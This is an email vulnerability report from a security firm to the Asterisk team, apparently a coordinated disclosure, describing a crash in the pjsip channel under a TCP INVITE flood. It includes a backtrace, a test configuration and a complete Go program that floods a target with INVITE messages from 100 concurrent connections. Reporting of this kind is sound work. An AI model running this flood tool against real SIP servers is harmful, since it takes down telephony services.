Content-Type: multipart/signed; boundary="Sig_/rJM5lNux1o97YZ26piE+Zes";
 protocol="application/pgp-signature"; micalg=pgp-sha256

--Sig_/rJM5lNux1o97YZ26piE+Zes
Content-Type: multipart/mixed; boundary="MP_/JsLyLZeLdT2xFl=O=4HKPp9"

--MP_/JsLyLZeLdT2xFl=O=4HKPp9
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: quoted-printable
Content-Disposition: inline

On Mon, 31 Aug 2020 10:54:49 -0300
Asterisk Development Team <asteriskteam@digium.com> wrote:

> What public PGP key was used for this message? The current Asterisk
> Development Team one is
> http://keys.gnupg.net/pks/lookup?op=3Dget&search=3D0x5D984BE337191CE7
>=20

A really old one for security@asterisk.org. Let's try again:

Dear Asterisk security team,

We identified a denial of service issue that appears to affect
the pjsip channel during an INVITE flood attack over TCP. Please find
the attached report with the full details. Do note that this is subject
to our vulnerability disclosure policy which can be found at
https://github.com/EnableSecurity/Vulnerability-Disclosure-Policy. Our
latest planned disclosure date according to our policy is 30th November
2020.

Please find my public key at
https://keybase.io/sandrogauci/pgp_keys.asc. Alfred's is at
https://keybase.io/alfredfarrugia/pgp_keys.asc.

We have included some code written in Go to easily reproduce this
issue. Let me know if you need any further details to reproduce the
issue.


Best regards,

--=20
   Sandro Gauci, CEO at Enable Security GmbH
=C2=A0=C2=A0 Register of Companies:=C2=A0 =C2=A0 =C2=A0 AG Charlottenburg H=
RB 173016 B
=C2=A0=C2=A0 Company HQ:=C2=A0 =C2=A0 =C2=A0 =C2=A0 =C2=A0 =C2=A0 =C2=A0 =
=C2=A0 =C2=A0Pappelallee 78/79, 10437 Berlin
   PGP/Encrypted comms:=C2=A0 =C2=A0     https://keybase.io/sandrogauci
=C2=A0=C2=A0 Other points of contact:=C2=A0 =C2=A0=C2=A0https://enablesecur=
ity.com/#contact-us



--=20
   Sandro Gauci, CEO at Enable Security GmbH
=C2=A0=C2=A0 Register of Companies:=C2=A0 =C2=A0 =C2=A0 AG Charlottenburg H=
RB 173016 B
=C2=A0=C2=A0 Company HQ:=C2=A0 =C2=A0 =C2=A0 =C2=A0 =C2=A0 =C2=A0 =C2=A0 =
=C2=A0 =C2=A0Pappelallee 78/79, 10437 Berlin
   PGP/Encrypted comms:=C2=A0 =C2=A0     https://keybase.io/sandrogauci
=C2=A0=C2=A0 Other points of contact:=C2=A0 =C2=A0=C2=A0https://enablesecur=
ity.com/#contact-us

--MP_/JsLyLZeLdT2xFl=O=4HKPp9
Content-Type: text/markdown
Content-Transfer-Encoding: quoted-printable
Content-Disposition: attachment; filename=README.md

# Asterisk crashes due to INVITE flood over TCP

- Fixed version: XXX
- Enable Security Advisory: XXX
- Asterisk Security Advisory: XXX
- Tested vulnerable versions: 17.5.1, 17.6.0
- Timeline:
    - Report date: XXX

## Description

When an Asterisk instance is flooded with INVITE messages over TCP, it was =
observed that after some time Asterisk crashes due to a segmentation fault.=
 The backtrace generated after the crash is:

```
3276        PJ_ASSERT_RETURN((cseq=3D(pjsip_cseq_hdr*)pjsip_msg_find_hdr(td=
ata->msg, PJSIP_H_CSEQ, NULL))!=3DNULL
(gdb) bt
#0  0x00007ffff7df1b80 in pjsip_inv_send_msg (inv=3D0x7fffc88aa5a8, tdata=
=3D0x7fffa706a6d8) at ../src/pjsip-ua/sip_inv.c:3276
#1  0x00007ffff4623c41 in ast_sip_session_send_response (session=3D0x7fffc8=
8ab9f0, tdata=3D0x7fffa706a6d8) at res_pjsip_session.c:1917
#2  0x00007ffff4627b6b in new_invite (invite=3D0x7fff94eccb60) at res_pjsip=
_session.c:3253
#3  0x00007ffff462815b in handle_new_invite_request (rdata=3D0x7fffa61ec608=
) at res_pjsip_session.c:3382
#4  0x00007ffff462833d in session_on_rx_request (rdata=3D0x7fffa61ec608) at=
 res_pjsip_session.c:3446
#5  0x00007ffff7e190ec in pjsip_endpt_process_rx_data (endpt=3D0x5555559c9d=
18, rdata=3D0x7fffa61ec608, p=3D0x7ffff47c66a0 <param>, p_handled=3D0x7fff9=
4eccc6c) at ../src/pjsip/sip_endpoint.c:930
#6  0x00007ffff47922a1 in distribute (data=3D0x7fffa61ec608) at res_pjsip/p=
jsip_distributor.c:955
#7  0x000055555574c7e1 in ast_taskprocessor_execute (tps=3D0x555555bb5a80) =
at taskprocessor.c:1237
#8  0x0000555555756dc7 in execute_tasks (data=3D0x555555bb5a80) at threadpo=
ol.c:1354
#9  0x000055555574c7e1 in ast_taskprocessor_execute (tps=3D0x5555559c8040) =
at taskprocessor.c:1237
#10 0x0000555555754698 in threadpool_execute (pool=3D0x5555559c6070) at thr=
eadpool.c:367
#11 0x000055555575655d in worker_active (worker=3D0x7fff98003e50) at thread=
pool.c:1137
#12 0x00005555557562bb in worker_start (arg=3D0x7fff98003e50) at threadpool=
.c:1056
#13 0x00005555557604ad in dummy_start (data=3D0x7fffa41fb6e0) at utils.c:12=
49
#14 0x00007ffff764e609 in start_thread (arg=3D<optimized out>) at pthread_c=
reate.c:477
#15 0x00007ffff728b103 in clone () at ../sysdeps/unix/sysv/linux/x86_64/clo=
ne.S:95
```

## Impact

Abuse of this vulnerability leads to denial of service in Asterisk when SIP=
 over TCP is in use.

## How to reproduce the issue

The following `pjsip.conf` configuration file was used to facilitate the re=
production of this issue:

```
[global]
debug=3Dyes

[transport-tcp]
type =3D transport
protocol =3D tcp
bind =3D 0.0.0.0

[anonymous]
type =3D endpoint
context =3D anon
allow =3D all
```

The following code in Go can be used to reproduce this issue:

```go
package main

import (
	"bytes"
	"flag"
	"fmt"
	"math/rand"
	"net"
	"strconv"
	"strings"
	"time"
)

const charset =3D "ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"

func init() {
	rand.Seed(time.Now().UnixNano())
}

func randstr(length int) string {
	b :=3D make([]byte, length)
	for i :=3D range b {
		b[i] =3D charset[rand.Intn(len(charset))]
	}
	return string(b)
}

type loop struct {
	host   string
	port   int
	conn   net.Conn
	invite []byte
	cseq   int
}

func (l *loop) start() {
	sdp :=3D "v=3D0\r\n"
	sdp +=3D "o=3D- 1598350717 1598350717 IN IP4 192.168.1.112\r\n"
	sdp +=3D "s=3D-\r\n"
	sdp +=3D "c=3DIN IP4 192.168.1.112\r\n"
	sdp +=3D "t=3D0 0\r\n"
	sdp +=3D "m=3Daudio 9999 RTP/AVP 0\r\n"
	sdp +=3D "a=3Drtpmap:0 PCMU/8000/1\r\n"
	sdp +=3D "a=3Dsendrecv\r\n"

	invite :=3D "INVITE sip:5cb49ced@127.0.0.1:5060 SIP/2.0\r\n"
	invite +=3D "Via: SIP/2.0/UDP 192.168.1.112:44896;rport;branch=3Dz9hG4bK-_=
BRANCH_\r\n"
	invite +=3D "Max-Forwards: 70\r\n"
	invite +=3D "From: <sip:5cb49ced@127.0.0.1:5060>;tag=3D2k309f\r\n"
	invite +=3D "To: <sip:5cb49ced@127.0.0.1:5060>\r\n"
	invite +=3D "Call-ID: 2345908ux\r\n"
	invite +=3D "CSeq: _CSEQ_ INVITE\r\n"
	invite +=3D "Contact: <sip:5cb49ced@192.168.1.112:44896;transport=3Dudp>\r=
\n"
	invite +=3D fmt.Sprintf("Content-Length: %d\r\n", len(sdp))
	invite +=3D "Content-Type: application/sdp\r\n"
	invite +=3D "\r\n"
	invite +=3D sdp

	l.invite =3D []byte(invite)

	var err error
	l.conn, err =3D net.DialTimeout("tcp4", fmt.Sprintf("%s:%d", l.host, l.por=
t), 5*time.Second)
	if err !=3D nil {
		fmt.Println(err.Error())
		time.Sleep(10 * time.Millisecond)
		go l.start()
		return
	}

	if l.conn !=3D nil {
		l.run()
	} else {
		time.Sleep(10 * time.Millisecond)
		go l.start()
	}
}

func (l *loop) run() {
	if err :=3D l.conn.SetWriteDeadline(time.Now().Add(10 * time.Millisecond))=
; err !=3D nil {
		if strings.Contains(err.Error(), "use of closed network connection") {
			l.start()
		}

	}

	var err error
	for {
		l.cseq++
		inv :=3D l.invite
		inv =3D bytes.ReplaceAll(inv, []byte("_BRANCH_"), []byte(randstr(8)))
		inv =3D bytes.ReplaceAll(inv, []byte("_CSEQ_"), []byte(strconv.Itoa(l.cse=
q)))

		if _, err =3D l.conn.Write(inv); err !=3D nil {
			go l.start()
			return
		}
	}
}

func main() {
	var port =3D flag.Int("p", 5060, "Port")
	var host =3D flag.String("h", "127.0.0.1", "Host")
	flag.Parse()

	for i :=3D 0; i < 100; i++ {
		go func() {
			l :=3D loop{
				host: *host,
				port: *port,
			}
			l.start()
		}()
	}
	select {}
}
```

## Solution and recommendations

XXX

## About Enable Security

[Enable Security](https://www.enablesecurity.com) develops offensive securi=
ty tools and provides quality penetration testing to help protect your real=
-time communications systems against attack.

## Disclaimer

The information in the advisory is believed to be accurate at the time of p=
ublishing based on currently available information. Use of the information =
constitutes acceptance for use in an AS IS condition. There are no warranti=
es with regard to this information. Neither the author nor the publisher ac=
cepts any liability for any direct, indirect, or consequential loss or dama=
ge arising from use of, or reliance on, this information.

## Disclosure policy

This report is subject to Enable Security's vulnerability disclosure policy=
 which can be found at <https://github.com/EnableSecurity/Vulnerability-Dis=
closure-Policy>.


--MP_/JsLyLZeLdT2xFl=O=4HKPp9--

--Sig_/rJM5lNux1o97YZ26piE+Zes
Content-Type: application/pgp-signature
Content-Description: OpenPGP digital signature

-----BEGIN PGP SIGNATURE-----

iQEzBAEBCAAdFiEEqhCOoNP21Pj+7eMXPBeb4UZ1iIMFAl9NAt4ACgkQPBeb4UZ1
iIOHLAf/eJEmwPfDGd8FlbrDEfTAi0Yaw/ffUKv6wz0oHTSpQSgol3ND28N2+/rp
8atpI6b2CZ2sboJIPTZw4MMK90SKQ0kWghfBwrjUDOQON+kEqfO2U4mY+liMKccP
ER3RmLqOVu08Mbd7wAcWKwHKigDCXjHd98v39gdR6Qskzy9b0hXKvav/HQdnICqP
xmq4s8Sp7TQ11F3tKMUxndCdmz4C157oQzjwHPaR4Q0sYcPrgvu+5IAjgGNkp8y+
zMqSQY7rAPP1KvktVo4epuaQ3CpHQKCxIWS2DUBhhkTHIwqia6hlQcuBoE2m59zd
xKk8OxrLHakLNV5k3CJXiue1XdArjg==
=iXk9
-----END PGP SIGNATURE-----

--Sig_/rJM5lNux1o97YZ26piE+Zes--